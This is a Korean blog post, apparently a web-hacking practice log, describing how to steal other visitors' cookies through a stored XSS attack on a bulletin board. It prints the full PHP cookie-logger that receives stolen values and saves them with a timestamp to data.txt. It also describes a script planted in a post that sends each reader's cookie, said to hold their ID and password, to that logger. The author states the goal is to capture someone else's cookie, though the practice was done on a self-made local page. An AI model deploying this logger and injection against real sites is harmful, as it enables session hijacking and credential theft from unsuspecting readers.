티스토리 뷰
https://duni0107-day.tistory.com/58?category=703364
XSS공격으로 쿠키값 탈취
XSS란? -> 게시판에 스크립트 코드를 삽입해 개발자가 고려하지 않은 기능이 작동되게 하는 공격 쿠키란? -> 방문자의 정보를 방문자 컴퓨터의 메모리에 저장하는 것 말함 ex) ID, 비밀번호, 방문 사이트 등 저장..
duni0107-day.tistory.com
위의 게시글에서는 나의 쿠키값을 XSS로 탈취하는 실습을 해보았다.
하지만!!!!!!!
내가 원하는 것은 나의 쿠키값이 아닌 글을 읽은 누군가의 쿠키값을 탈취하는 것이다.
어떻게 해야될까?
<cookie.php>
<?php
$cookie=$_GET['data'];
$atime=date("y-m-d H:i:s");
$log=fopen("data.txt","a");
fwrite($log, $atime." ".$cookie."\r\n");
fclose($log);
echo "<img src=hackerDUN.png></img>";
?>먼저 나의 로컬 웹에 cookie.php를 작성한다.
데이터를 받아와서 data.txt로 저장하고 설정한
이미지를 출력한다는 내용의 코딩이다.
그 다음 업로드할 글에는 다음과 같은 스크립트를 넣어준다.
글을 읽으면 새 창이 열리면서 cookie.php가 실행되면서
cookie 값이 넘어가도록 해주었다.
★경로를 제대로 써줘야함.
난 실습을 온전히 로컬PC로만 진행해줬기때문에 제대로 된 경로가 필요하지 않았다.
그리고 글을 저장한 뒤 누군가가 글을 읽으면 새 창으로 설정한 이미지가 뜨고
읽은 사람의 쿠키값이 내 로컬에 data.txt라는 파일로 저장된다.
저번 실습과 마찬가지로 쿠키값에는 ID,PW가 바로 노출되도록 해줌
※제가 만든 페이지에서 실습했습니다.
'웹 공부 > 웹 해킹 실습' 카테고리의 다른 글
| XSS(Cross Site Scripting) 필터링 우회 (0) | 2021.03.31 |
|---|---|
| 디렉토리 노출 취약점 (Directory Listing) 공격 (5) | 2019.07.24 |
| 파일 다운로드 (File Download) 취약점 공격 (2) | 2019.07.24 |
| XSS공격으로 쿠키값 탈취 (0) | 2019.06.23 |
| File Upload 공격 (3) | 2019.03.20 |
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday